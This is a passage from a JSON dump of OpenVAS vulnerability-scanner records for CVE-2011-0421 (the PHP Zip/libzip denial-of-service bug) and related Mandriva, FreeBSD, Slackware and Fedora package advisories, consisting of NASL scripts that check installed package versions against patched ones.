rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1-devel\", rpm:\"libzip1-devel~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1-devel\", rpm:\"lib64zip1-devel~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip-devel\", rpm:\"libzip-devel~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip-devel\", rpm:\"lib64zip-devel~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1-devel\", rpm:\"libzip1-devel~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1-devel\", rpm:\"lib64zip1-devel~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69359", "href": "http://plugins.openvas.org/nasl.php?oid=69359", "type": "openvas", "title": "FreeBSD Ports: php5-zip", "sourceData": "#\n#VID fe853666-56ce-11e0-9668-001fd0d616cf\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID fe853666-56ce-11e0-9668-001fd0d616cf\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: php5-zip\n\nCVE-2011-0421\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_id(69359);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0421\");\n script_name(\"FreeBSD Ports: php5-zip\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"php5-zip\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.6\")<0) {\n txt += 'Package php5-zip version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:136141256231069359", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069359", "type": "openvas", "title": "FreeBSD Ports: php5-zip", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_php5-zip0.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID fe853666-56ce-11e0-9668-001fd0d616cf\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69359\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0421\");\n script_name(\"FreeBSD Ports: php5-zip\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: php5-zip\n\nCVE-2011-0421\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"php5-zip\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.6\")<0) {\n txt += 'Package php5-zip version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:1361412562310831407", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831407", "type": "openvas", "title": "Mandriva Update for libzip MDVSA-2011:099 (libzip)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libzip MDVSA-2011:099 (libzip)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-05/msg00024.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831407\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:099\");\n script_cve_id(\"CVE-2011-0421\");\n script_name(\"Mandriva Update for libzip MDVSA-2011:099 (libzip)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libzip'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"libzip on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been identified and fixed in libzip:\n\n The _zip_name_locate function in zip_name_locate.c in the Zip extension\n in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED\n argument, which might allow context-dependent attackers to cause\n a denial of service (application crash) via an empty ZIP archive\n that is processed with a (1) locateName or (2) statName operation\n (CVE-2011-0421).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1-devel\", rpm:\"libzip1-devel~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1-devel\", rpm:\"lib64zip1-devel~0.9~1.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip-devel\", rpm:\"libzip-devel~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip-devel\", rpm:\"lib64zip-devel~0.9.3~2.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libzip\", rpm:\"libzip~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1\", rpm:\"libzip1~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libzip1-devel\", rpm:\"libzip1-devel~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1\", rpm:\"lib64zip1~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64zip1-devel\", rpm:\"lib64zip1-devel~0.9~1.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:50:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2004-0421"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-210-01.", "modified": "2017-07-06T00:00:00", "published": "2012-09-10T00:00:00", "id": "OPENVAS:71955", "href": "http://plugins.openvas.org/nasl.php?oid=71955", "type": "openvas", "title": "Slackware Advisory SSA:2011-210-01 libpng ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_210_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-210-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current\nto fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2011-210-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-210-01\";\n \nif(description)\n{\n script_id(71955);\n script_cve_id(\"CVE-2004-0421\", \"CVE-2011-0421\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-210-01 libpng \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.4.8-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.4.8-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2004-0421"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-210-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-10T00:00:00", "id": "OPENVAS:136141256231071955", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071955", "type": "openvas", "title": "Slackware Advisory SSA:2011-210-01 libpng", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_210_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-210-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71955\");\n script_cve_id(\"CVE-2004-0421\", \"CVE-2011-0421\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-210-01 libpng\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2|11\\.0|12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-210-01\");\n\n script_tag(name:\"insight\", value:\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current\nto fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2011-210-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.46-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.4.8-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.4.8-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:55:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "description": "Check for the Version of php-eaccelerator", "modified": "2017-07-10T00:00:00", "published": "2011-04-11T00:00:00", "id": "OPENVAS:862969", "href": "http://plugins.openvas.org/nasl.php?oid=862969", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2011-3636", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2011-3636\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php-eaccelerator on Fedora 14\";\ntag_insight = \"eAccelerator is a further development of the MMCache PHP 